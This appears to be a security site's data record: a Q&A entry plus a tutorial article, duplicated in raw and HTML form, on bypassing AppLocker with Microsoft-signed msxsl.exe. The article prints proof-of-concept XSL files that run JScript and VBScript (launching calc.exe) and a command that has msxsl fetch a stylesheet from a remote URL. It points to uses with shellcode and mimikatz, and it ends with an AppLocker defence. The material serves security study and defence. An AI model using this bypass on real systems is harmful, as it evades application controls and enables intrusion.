[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$faTq2LIkydfACjCLpyxqeuQbwnpuNkR50mVupJ815MVE":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},548,"What additional capabilities does combining msxsl with .NET script loading provide?","By leveraging previous techniques for loading .NET programs via JScript, msxsl.exe can execute C# code, which in turn enables running shellcode, mimikatz, or PowerShell scripts. This extends the bypass beyond simple calculator launches to full post‑exploitation actions. The approach is referenced in the article's discussion of [Loading .Net Programs Using JS] and is applied through modified XML scripts.","\u003Cp>By leveraging previous techniques for loading .NET programs via JScript, msxsl.exe can execute C# code, which in turn enables running shellcode, mimikatz, or PowerShell scripts. This extends the bypass beyond simple calculator launches to full post‑exploitation actions. The approach is referenced in the article&#39;s discussion of [Loading .Net Programs Using JS] and is applied through modified XML scripts.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fuse-msxsl-to-bypass-applocker\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-additional-capabilities-does-combining-msxsl-with-net-script-loading-provid-1777483151712",".NET loading, shellcode, mimikatz, PowerShell, msxsl, script execution, C#",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},135,"Use msxsl to bypass AppLocker","use-msxsl-to-bypass-applocker","Learn how to use Microsoft-signed msxsl.exe to bypass AppLocker and execute JScript\u002FVBScript code, including shellcode and exploits.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>A technique shared by Casey Smith@subTee on Twitter demonstrates that using Microsoft-signed msxsl.exe can execute JScript code, thereby bypassing AppLocker.\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017972658_0_6f676d4ab1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Twitter address is as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002FsubTee\u002Fstatus\u002F877616321747271680\u003C\u002Fp>\u003Cp>\u003Cstrong>POC address is as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002F47f16d60efc9f7cfefd62fb7a712ec8d\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will introduce this technique, analyze methods for further exploitation, and extend it by describing how to use msxsl.exe to execute VBScript code.\u003C\u002Fp>\u003Ch2>0x02 msxsl\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. msxsl.exe\u003C\u002Fh3>\u003Cul>\u003Cli>XSL (Extensible Stylesheet Language) Transformer\u003C\u002Fli>\u003Cli>Command-line tool\u003C\u002Fli>\u003Cli>Signed with Microsoft digital signature\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Download link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fdownload\u002Fdetails.aspx?id=21714\u003C\u002Fp>\u003Cp>Execute as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017985191_1_72e903401f.jpeg\">\u003C\u002Fp>\u003Cp>Refer to Casey Smith's POC:\u003C\u002Fp>\u003Cp>customers.xml:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\"?-->\u003Cbr>\u003C!--?xml-stylesheet type=\"text\u002Fxsl\" href=\"script.xsl\" ?-->\u003Cbr>\u003Ccustomers>\u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>John Smith\u003C\u002Fname>\u003Cbr>      \u003C\u002Fcustomer>\u003C\u002Fcustomers>\u003C\u002Fp>\u003Caddress>123 Elm St.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(123) 456-7890\u003C\u002Fphone>\u003Cbr>   \u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>Mary Jones\u003C\u002Fname>\u003Cbr>      \u003Caddress>456 Oak Ave.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(156) 789-0123\u003C\u002Fphone>\u003Cbr>   \u003C\u002Fcustomer>\u003Cbr>\u003Cp>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>script.xml:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version='1.0'?-->\u003Cbr>\u003Cxsl:stylesheet version=\"1.0\" \u003Cbr=\"\">      xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\"\u003Cbr>      xmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\u003Cbr>      xmlns:user=\"http:\u002F\u002Fmycompany.com\u002Fmynamespace\"&gt;\u003Cbr>\u003Cbr>\u003Cmsxsl:script language=\"JScript\" implements-prefix=\"user\">\u003Cbr>   function xml(nodelist) {\u003Cbr>\tvar r = new ActiveXObject(\"WScript.Shell\").Run(\"calc.exe\");\u003Cbr>      return nodelist.nextNode().xml;\u003Cbr>\t  \u003Cbr>   }\u003Cbr>\u003C\u002Fmsxsl:script>\u003Cbr>\u003Cxsl:template match=\"\u002F\">\u003Cbr>   \u003Cxsl:value-of select=\"user:xml(.)\">\u003Cbr>\u003C\u002Fxsl:value-of>\u003C\u002Fxsl:template>\u003Cbr>\u003C\u002Fxsl:stylesheet>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Successfully executed JScript code, calculator popped up, PoC execution as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017989608_2_cad42309e8.jpeg\">\u003C\u002Fp>\u003Cp>Enable AppLocker, add rules to block the execution of JS scripts, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017994250_3_1cd8798cc4.jpeg\">\u003C\u002Fp>\u003Cp>However, using msxsl can still execute JScript code\u003C\u002Fp>\u003Cp>In a previous article titled 'Loading .Net Programs Using JS', methods for loading .Net programs via JScript scripts were introduced. Combined with this article, the following inference can be drawn:\u003C\u002Fp>\u003Cp>\u003Cstrong>Using msxsl can also execute C# code\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Specifically, it can achieve the following functions:\u003C\u002Fp>\u003Cul>\u003Cli>Execute shellcode\u003C\u002Fli>\u003Cli>Execute mimikatz\u003C\u002Fli>\u003Cli>Execute PowerShell scripts\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>2. Execute shellcode\u003C\u002Fh3>\u003Cp>Refer to Cn33liz's StarFighters, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FCn33liz\u002FStarFighters\u002Fblob\u002Fmaster\u002FStarFighter.js\u003C\u002Fp>\u003Cp>Combined with Casey's POC, it is possible to execute shellcode using msxsl\u003C\u002Fp>\u003Cp>The complete code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Testing as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017997383_4_c64276ab8a.jpeg\">\u003C\u002Fp>\u003Cp>For executing mimikatz and PowerShell scripts, the approach can refer to the previous article 'Loading .Net Programs Using JS'\u003C\u002Fp>\u003Ch2>0x03 Script Optimization\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Analyze the XML file format and appropriately optimize Casey's POC\u003C\u002Fp>\u003Ch3>1. Simplify customers.xml\u003C\u002Fh3>\u003Cp>XML element naming rules:\u003C\u002Fp>\u003Cul>\u003Cli>Names can contain letters, digits, and other characters\u003C\u002Fli>\u003Cli>Names cannot start with a digit or punctuation mark\u003C\u002Fli>\u003Cli>Names cannot start with the characters \"xml\" (or XML, Xml)\u003C\u002Fli>\u003Cli>Names cannot contain spaces\u003C\u002Fli>\u003Cli>Any name can be used; there are no reserved words\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The original POC content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\"?-->\u003Cbr>\u003C!--?xml-stylesheet type=\"text\u002Fxsl\" href=\"script.xsl\" ?-->\u003Cbr>\u003Ccustomers>\u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>John Smith\u003C\u002Fname>\u003Cbr>      \u003C\u002Fcustomer>\u003C\u002Fcustomers>\u003C\u002Fp>\u003Caddress>123 Elm St.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(123) 456-7890\u003C\u002Fphone>\u003Cbr>   \u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>Mary Jones\u003C\u002Fname>\u003Cbr>      \u003Caddress>456 Oak Ave.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(156) 789-0123\u003C\u002Fphone>\u003Cbr>   \u003C\u002Fcustomer>\u003Cbr>\u003Cp>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Analysis shows that the XML file in parameter 1 is not important; elements can be arbitrarily specified.\u003C\u002Fp>\u003Cp>Remove irrelevant parameters, rename an XML element, and simplify the code as follows:\u003C\u002Fp>\u003Cp>\u003Ca>\u003C\u002Fa>\u003C\u002Fp>\u003Cp>Additionally, to reduce file creation, using script.xsl as the first XML file parameter is also acceptable.\u003C\u002Fp>\u003Cp>For example, the parameters are as follows:\u003C\u002Fp>\u003Cp>msxsl.exe script.xsl script.xsl\u003C\u002Fp>\u003Cp>Execution successful, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018000718_5_32aa6ad6c6.jpeg\">\u003C\u002Fp>\u003Ch3>2. Optimize script.xsl\u003C\u002Fh3>\u003Cp>Execute VBScript code:\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Testing shows that this XML script does not support CSharp, contradicting the documentation; this issue needs to be resolved\u003C\u002Fp>\u003Cp>Documentation address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002F533texsx(VS.71).aspx\u003C\u002Fp>\u003Cp>For VBScript language, return is not used to indicate function return values; instead, function name = value to return is used to represent the function's return value\u003C\u002Fp>\u003Cp>Complete content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version='1.0'?-->\u003Cbr>\u003Cxsl:stylesheet version=\"1.0\" \u003Cbr=\"\">      xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\"\u003Cbr>      xmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\u003Cbr>      xmlns:user=\"urn:my-scripts\"&gt;\u003Cbr>\u003Cbr>\u003Cmsxsl:script language=\"VBScript\" implements-prefix=\"user\">\u003Cbr>function myFunction()\u003Cbr>\tset shell=createobject(\"wscript.shell\")\u003Cbr>\tshell.run \"calc.exe\",0\u003Cbr>\tmyFunction = 0\u003Cbr>end function\u003Cbr>\u003Cbr>\u003C\u002Fmsxsl:script>\u003Cbr>\u003Cxsl:template match=\"\u002F\">\u003Cbr>\u003Cxsl:value-of select=\"user:myFunction()\">\u003Cbr>\u003C\u002Fxsl:value-of>\u003C\u002Fxsl:template>\u003Cbr>\u003C\u002Fxsl:stylesheet>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The above file content corresponds to the GitHub address: an open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The function name must correspond:\u003C\u002Fp>\u003Cp>\u003Cxsl:value-of select=\"user:myFunction()\">\u003C\u002Fxsl:value-of>\u003C\u002Fp>\u003Ch3>3. Remote Execution\u003C\u002Fh3>\u003Cp>msxsl.exe also supports remote execution with the following parameters:\u003C\u002Fp>\u003Cp>msxsl.exe https:\u002F\u002Fraw.githubusercontent.某开源项目.xml https:\u002F\u002Fraw.githubusercontent.某开源项目.xml\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018004851_6_4f3012f971.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This method was learned from Evi1cg, blog address: https:\u002F\u002Fevi1cg.me\u002Farchives\u002FAppLocker_Bypass_MSXSL.html\u003C\u002Fp>\u003Ch2>0x04 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Add executable rules for AppLocker, specifying msxsl.exe\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018009789_7_0225bac5bc.jpeg\">\u003C\u002Fp>\u003Cp>Even if the file path is changed, msxsl.exe still cannot be executed\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018011853_8_22eb9630cb.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of bypassing AppLocker using msxsl, but by customizing AppLocker rules, it is still possible to restrict the use of this method.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>A technique shared by Casey Smith@subTee on Twitter demonstrates that using Microsoft-signed msxsl.exe can execute JScript code, thereby bypassing AppLocker.\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017972658_0_6f676d4ab1-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Twitter address is as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002FsubTee\u002Fstatus\u002F877616321747271680\u003C\u002Fp>\u003Cp>\u003Cstrong>POC address is as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002F47f16d60efc9f7cfefd62fb7a712ec8d\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will introduce this technique, analyze methods for further exploitation, and extend it by describing how to use msxsl.exe to execute VBScript code.\u003C\u002Fp>\u003Ch2>0x02 msxsl\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. msxsl.exe\u003C\u002Fh3>\u003Cul>\u003Cli>XSL (Extensible Stylesheet Language) Transformer\u003C\u002Fli>\u003Cli>Command-line tool\u003C\u002Fli>\u003Cli>Signed with Microsoft digital signature\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Download link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fdownload\u002Fdetails.aspx?id=21714\u003C\u002Fp>\u003Cp>Execute as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017985191_1_72e903401f-1.jpeg\">\u003C\u002Fp>\u003Cp>Refer to Casey Smith's POC:\u003C\u002Fp>\u003Cp>customers.xml:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\"?-->\u003Cbr>\u003C!--?xml-stylesheet type=\"text\u002Fxsl\" href=\"script.xsl\" ?-->\u003Cbr>\u003Ccustomers>\u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>John Smith\u003C\u002Fname>\u003Cbr>      \u003C\u002Fcustomer>\u003C\u002Fcustomers>\u003C\u002Fp>\u003Caddress>123 Elm St.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(123) 456-7890\u003C\u002Fphone>\u003Cbr>   \u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>Mary Jones\u003C\u002Fname>\u003Cbr>      \u003Caddress>456 Oak Ave.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(156) 789-0123\u003C\u002Fphone>\u003Cbr>   \u003C\u002Fcustomer>\u003Cbr>\u003Cp>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>script.xml:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version='1.0'?-->\u003Cbr>\u003Cxsl:stylesheet version=\"1.0\" \u003Cbr=\"\">      xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\"\u003Cbr>      xmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\u003Cbr>      xmlns:user=\"http:\u002F\u002Fmycompany.com\u002Fmynamespace\"&gt;\u003Cbr>\u003Cbr>\u003Cmsxsl:script language=\"JScript\" implements-prefix=\"user\">\u003Cbr>   function xml(nodelist) {\u003Cbr>\tvar r = new ActiveXObject(\"WScript.Shell\").Run(\"calc.exe\");\u003Cbr>      return nodelist.nextNode().xml;\u003Cbr>\t  \u003Cbr>   }\u003Cbr>\u003C\u002Fmsxsl:script>\u003Cbr>\u003Cxsl:template match=\"\u002F\">\u003Cbr>   \u003Cxsl:value-of select=\"user:xml(.)\">\u003Cbr>\u003C\u002Fxsl:value-of>\u003C\u002Fxsl:template>\u003Cbr>\u003C\u002Fxsl:stylesheet>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Successfully executed JScript code, calculator popped up, PoC execution as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017989608_2_cad42309e8-1.jpeg\">\u003C\u002Fp>\u003Cp>Enable AppLocker, add rules to block the execution of JS scripts, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017994250_3_1cd8798cc4-1.jpeg\">\u003C\u002Fp>\u003Cp>However, using msxsl can still execute JScript code\u003C\u002Fp>\u003Cp>In a previous article titled 'Loading .Net Programs Using JS', methods for loading .Net programs via JScript scripts were introduced. Combined with this article, the following inference can be drawn:\u003C\u002Fp>\u003Cp>\u003Cstrong>Using msxsl can also execute C# code\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Specifically, it can achieve the following functions:\u003C\u002Fp>\u003Cul>\u003Cli>Execute shellcode\u003C\u002Fli>\u003Cli>Execute mimikatz\u003C\u002Fli>\u003Cli>Execute PowerShell scripts\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>2. Execute shellcode\u003C\u002Fh3>\u003Cp>Refer to Cn33liz's StarFighters, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FCn33liz\u002FStarFighters\u002Fblob\u002Fmaster\u002FStarFighter.js\u003C\u002Fp>\u003Cp>Combined with Casey's POC, it is possible to execute shellcode using msxsl\u003C\u002Fp>\u003Cp>The complete code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Testing as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017997383_4_c64276ab8a-1.jpeg\">\u003C\u002Fp>\u003Cp>For executing mimikatz and PowerShell scripts, the approach can refer to the previous article 'Loading .Net Programs Using JS'\u003C\u002Fp>\u003Ch2>0x03 Script Optimization\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Analyze the XML file format and appropriately optimize Casey's POC\u003C\u002Fp>\u003Ch3>1. Simplify customers.xml\u003C\u002Fh3>\u003Cp>XML element naming rules:\u003C\u002Fp>\u003Cul>\u003Cli>Names can contain letters, digits, and other characters\u003C\u002Fli>\u003Cli>Names cannot start with a digit or punctuation mark\u003C\u002Fli>\u003Cli>Names cannot start with the characters \"xml\" (or XML, Xml)\u003C\u002Fli>\u003Cli>Names cannot contain spaces\u003C\u002Fli>\u003Cli>Any name can be used; there are no reserved words\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The original POC content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\"?-->\u003Cbr>\u003C!--?xml-stylesheet type=\"text\u002Fxsl\" href=\"script.xsl\" ?-->\u003Cbr>\u003Ccustomers>\u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>John Smith\u003C\u002Fname>\u003Cbr>      \u003C\u002Fcustomer>\u003C\u002Fcustomers>\u003C\u002Fp>\u003Caddress>123 Elm St.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(123) 456-7890\u003C\u002Fphone>\u003Cbr>   \u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>Mary Jones\u003C\u002Fname>\u003Cbr>      \u003Caddress>456 Oak Ave.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(156) 789-0123\u003C\u002Fphone>\u003Cbr>   \u003C\u002Fcustomer>\u003Cbr>\u003Cp>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Analysis shows that the XML file in parameter 1 is not important; elements can be arbitrarily specified.\u003C\u002Fp>\u003Cp>Remove irrelevant parameters, rename an XML element, and simplify the code as follows:\u003C\u002Fp>\u003Cp>\u003Ca>\u003C\u002Fa>\u003C\u002Fp>\u003Cp>Additionally, to reduce file creation, using script.xsl as the first XML file parameter is also acceptable.\u003C\u002Fp>\u003Cp>For example, the parameters are as follows:\u003C\u002Fp>\u003Cp>msxsl.exe script.xsl script.xsl\u003C\u002Fp>\u003Cp>Execution successful, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018000718_5_32aa6ad6c6-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Optimize script.xsl\u003C\u002Fh3>\u003Cp>Execute VBScript code:\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Testing shows that this XML script does not support CSharp, contradicting the documentation; this issue needs to be resolved\u003C\u002Fp>\u003Cp>Documentation address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002F533texsx(VS.71).aspx\u003C\u002Fp>\u003Cp>For VBScript language, return is not used to indicate function return values; instead, function name = value to return is used to represent the function's return value\u003C\u002Fp>\u003Cp>Complete content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version='1.0'?-->\u003Cbr>\u003Cxsl:stylesheet version=\"1.0\" \u003Cbr=\"\">      xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\"\u003Cbr>      xmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\u003Cbr>      xmlns:user=\"urn:my-scripts\"&gt;\u003Cbr>\u003Cbr>\u003Cmsxsl:script language=\"VBScript\" implements-prefix=\"user\">\u003Cbr>function myFunction()\u003Cbr>\tset shell=createobject(\"wscript.shell\")\u003Cbr>\tshell.run \"calc.exe\",0\u003Cbr>\tmyFunction = 0\u003Cbr>end function\u003Cbr>\u003Cbr>\u003C\u002Fmsxsl:script>\u003Cbr>\u003Cxsl:template match=\"\u002F\">\u003Cbr>\u003Cxsl:value-of select=\"user:myFunction()\">\u003Cbr>\u003C\u002Fxsl:value-of>\u003C\u002Fxsl:template>\u003Cbr>\u003C\u002Fxsl:stylesheet>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The above file content corresponds to the GitHub address: an open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The function name must correspond:\u003C\u002Fp>\u003Cp>\u003Cxsl:value-of select=\"user:myFunction()\">\u003C\u002Fxsl:value-of>\u003C\u002Fp>\u003Ch3>3. Remote Execution\u003C\u002Fh3>\u003Cp>msxsl.exe also supports remote execution with the following parameters:\u003C\u002Fp>\u003Cp>msxsl.exe https:\u002F\u002Fraw.githubusercontent.某开源项目.xml https:\u002F\u002Fraw.githubusercontent.某开源项目.xml\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018004851_6_4f3012f971-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This method was learned from Evi1cg, blog address: https:\u002F\u002Fevi1cg.me\u002Farchives\u002FAppLocker_Bypass_MSXSL.html\u003C\u002Fp>\u003Ch2>0x04 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Add executable rules for AppLocker, specifying msxsl.exe\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018009789_7_0225bac5bc-1.jpeg\">\u003C\u002Fp>\u003Cp>Even if the file path is changed, msxsl.exe still cannot be executed\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018011853_8_22eb9630cb-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of bypassing AppLocker using msxsl, but by customizing AppLocker rules, it is still possible to restrict the use of this method.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1027,"Onedaysec",3,"published","2026-02-02T07:51:00.062Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Bypass AppLocker with msxsl.exe to Execute JScript & VBScript","msxsl, AppLocker bypass, JScript execution, VBScript, Windows security, Casey Smith, XML transformation, shellcode, mimikatz, PowerShell",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46],550,549,547,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.811Z","2026-07-23T16:01:44.039Z","draft","2026-07-23T16:13:13.659Z"]